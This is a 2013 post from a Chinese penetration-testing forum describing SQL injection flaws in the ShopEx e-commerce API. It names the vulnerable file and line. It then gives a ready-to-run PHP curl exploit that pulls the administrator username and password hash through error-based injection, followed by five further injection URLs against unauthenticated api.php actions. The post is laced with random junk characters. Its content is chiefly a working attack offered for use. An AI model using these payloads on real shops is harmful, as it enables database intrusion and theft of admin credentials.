中国网络渗透测试联盟

标题: shopEx最新版的API注入漏洞分析附利用exp [打印本页]

作者: admin    时间: 2013-7-27 18:34
标题: shopEx最新版的API注入漏洞分析附利用exp
缺陷文件:\core\api\payment\2.0\api_b2b_2_0_payment_cfg.php
& ?$ \; M9 {- s( o. m" O/ xcore\api\payment\1.0\api_b2b_2_0_payment_cfg.php- x- G& [4 Z9 A* z; y' L: [3 b" t

: w# L/ ^/ \# Y6 L第44行 $data['columns'] 未做过滤导致注入
. A. p5 k1 L: w, f+ X$ Z4 A( U( Q( m/ q
<?php set_time_limit(0); ob_flush(); echo 'Test: http://localhost:808'."\r\n"; $sql = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select (select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&disabled=1'; $url='http://localhost:808/api.php?act=search_payment_cfg_list&api_version=2.0'; $ch = curl_init(); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POSTFIELDS, $sql); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); flush(); $data = curl_exec($ch); echo $data; curl_close($ch); ?>外带一句 ShopEx对API操作的模块未做认证,任何用户都可访问,攻击者可通过它来对产品的分类,类型,规格,品牌等,进行添加,删除和修改,过滤不当还可造成注入.7 j- r5 ~+ |5 b/ j, K' I
' G) H5 e1 S! l; Y) v- A
注射1:
4 h6 w6 K  S+ A7 p, H" b( J. _0 v2 k, A; j7 X* F/ R
http://www.0day5.com/api.php POST act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#
1 r. z% O* s  ~' N- N" h
& j8 S# n( C& |! o) j  h# Q. `9 i8 u注射2:: P1 Q! M- \0 K- L
http://www.0day5.com/shopex/api.php act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"}) Y; l% ?* M/ o
7 g' e+ l) L8 p) j
注射3:3 M; u! l& D  s  V/ B
  http://www.0day5.com/shopex/api.php act=get_spec_single&api_version=3.1&spec_id=1 xxx- |7 e0 x% M  s8 x. P* H& B: A
注射4:5 G' h8 J/ e6 i+ a; P- x' N- A

0 Y& Y( _! t3 S8 H) [! u! o  S3 vhttp://www.0day5.com/shopex/api.php act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1¤cy=14 v( i; s- Y* p  k$ t

$ U! P1 Y$ V: C/ N5 O; X( H1 G9 h- C' t: Q- r8 ^6 f
注射5:
5 {8 [- e$ {5 W* `$ Z' p  http://www.0day5.com/shopex/api.php act=search_dly_h_area&return_data=string&columns=xxxxx2 y7 ]) y! {% j: o  k" W
* g4 j/ h! P. g
: f4 y1 K$ a. W: g7 s0 p0 f
& b0 U% B  v; W# n; R

3 K. J6 M* l+ d4 l, L5 o( A. a. D! U! }
. R7 X7 |+ ~! r0 e4 A





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2